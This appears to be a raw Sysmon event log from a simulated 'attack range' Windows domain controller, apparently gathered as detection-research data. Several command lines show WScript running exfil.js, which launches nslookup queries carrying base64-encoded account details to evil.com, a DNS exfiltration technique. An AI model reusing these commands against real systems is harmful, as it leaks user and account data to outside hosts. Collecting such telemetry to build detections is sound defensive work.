14:21:27.173{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207319Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.173{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207318Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.173{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-FA42-000000005F02}5408C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207317Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.173{2E1864BB-18E0-629A-6742-000000005F02}39761736C:\Windows\System32\WScript.exe{2E1864BB-18E7-629A-FA42-000000005F02}5408C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207316Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.173{2E1864BB-18E7-629A-FA42-000000005F02}5408C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrouxlkm.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207315Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.170{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwrtcp.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207314Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.120{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207313Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.120{2E1864BB-18E7-629A-F842-000000005F02}45727408C:\Windows\system32\conhost.exe{2E1864BB-18E7-629A-F942-000000005F02}8052C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207312Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.120{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207311Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.120{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207310Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.120{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207309Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.120{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-F942-000000005F02}8052C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207308Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.120{2E1864BB-18E7-629A-F742-000000005F02}72362944C:\Windows\system32\cmd.exe{2E1864BB-18E7-629A-F942-000000005F02}8052C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207307Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.126{2E1864BB-18E7-629A-F942-000000005F02}8052C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E7-629A-F742-000000005F02}7236C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwrtcp.tmp 2>&1 10341000x8000000000000000207306Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.104{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E7-629A-F842-000000005F02}4572C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207305Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.104{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E7-629A-F842-000000005F02}4572C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207304Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.104{2E1864BB-18E7-629A-F842-000000005F02}45727408C:\Windows\system32\conhost.exe{2E1864BB-18E7-629A-F742-000000005F02}7236C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207303Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.089{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-F842-000000005F02}4572C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207302Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.089{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207301Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.089{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207300Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.089{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207299Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.089{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207298Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.089{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-F742-000000005F02}7236C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207297Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.089{2E1864BB-18E0-629A-6742-000000005F02}39767152C:\Windows\System32\WScript.exe{2E1864BB-18E7-629A-F742-000000005F02}7236C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207296Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.088{2E1864BB-18E7-629A-F742-000000005F02}7236C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwrtcp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207295Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.073{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlthmyoh.tmpMD5=7D9173BD0DB6CB1EF243CECFF708168B,SHA256=E1F06C46829F00B73E93E5CA6A77E87CA3F897BE9C930070FC4C0794E517005D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207294Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.051{2E1864BB-18E7-629A-F542-000000005F02}54206432C:\Windows\system32\conhost.exe{2E1864BB-18E7-629A-F642-000000005F02}4228C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207293Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.051{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207292Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.051{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207291Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.051{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207290Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.051{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 